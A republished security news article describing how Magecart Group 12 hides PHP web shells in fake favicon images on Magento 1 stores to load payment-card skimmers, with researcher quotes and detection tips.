Magecart Skimming Tactics Evolve – BankInfoSecurity

0


Malwarebytes describes updated attack techniques

Prajeet Nair (@prajeetspeaks) •
May 18, 2021

Magecart Group 12, known for skimming payment cards from e-commerce websites using JavaScript skimmers, uses updated attack technique to gain remote administrative access to sites that are running an older version Adobe’s Magento software, according to an analysis of Malwarebytes Labs Threat Intelligence team.

See also: Computing Leading the Way: How the Pandemic Empowered Computing

The latest incarnation of an umbrella group of at least seven separate cybercriminal groups, Magecart Group 12, which was embroiled in another hacking frenzy last fall, uses an updated technique that uses known PHP web shells. under the name of Smilodon or Megalodon, says Malwarebytes. Web shells dynamically load JavaScript hover code via server-side requests to online stores so that they are not detected by client-side security tools so that they can then steal payment information.

In previously reported Magecart-type attacks, a malicious skimming script was injected into payment pages with credit card and personal information removed and sent to a remote server, according to an analysis by Trend Micro.

“We found several dozen compromised websites with the exact same template. All of them use Magento version 1, ”Jérôme Segura, director of threat intelligence at Malwarebytes, told Information Security Media Group.

“We know that to browse credit card data, attackers can do it either on the client side using JavaScript or on the server side using PHP. However, there are hybrid versions, and this is the case here too, ”explains Segura.

In September 2020, researchers warned that around 2,000 sites using the 12-year-old Magento 1 e-commerce platform had been targeted by JavaScript skimmers designed to steal payment card data during the online payment process. (see: Payment Card Skimming Reaches 2,000 Ecommerce Sites).

Imitate an image file

In their recent analysis of websites running Magento 1, Malwarebytes researchers observed new PHP web shells disguised as a favicon – a url or shortcut icon, which they linked to Magento 12. The file named Magento. png attempts to pass itself off as “image / png” but does not have the correct PNG format for a valid image file.

“The way it’s injected into compromised sites is to replace the legitimate shortcut icon tags with a path to the bogus PNG file,” Segura explains. “Unlike previous incidents where a fake favicon image was used to hide malicious JavaScript code, it turned out to be a PHP web shell. However, in its current implementation, this PHP script will not load correctly.”

Web shells are a type of malware found on websites that allow an attacker to maintain remote access and administration. “They are usually uploaded to a web server after a vulnerability has been exploited (eg SQL injection),” Segura notes.

Malwarebytes says that while there are several ways to load skimming code, the most common is to call an external JavaScript resource. Every time an online customer visits an e-commerce site, the browser makes a request to a domain hosting the skimmer.

Segura adds: “Online stores can detect this type of malware with a server-side scanner, while on the client side you need to have access to the DOM to detect the injected malicious code. One option here is to use a browser extension with heuristic capabilities. “

DOM stands for Document Object Model, which is a cross-platform, language-independent interface that treats an XML or HTML document as a tree structure in which each node is an object representing a part of the document.

Widely used Magento

Adobe Magento is one of the most widely used e-commerce platforms in the world, with around 250,000 users, according to Adobe website.

Adobe reported in November 2019 that a vulnerability in the Magento e-commerce market was exploited by a third party to access account information (see: Magento Marketplace Suffers Data Breach, Adobe Warns).





Source link

Leave A Reply

Your email address will not be published.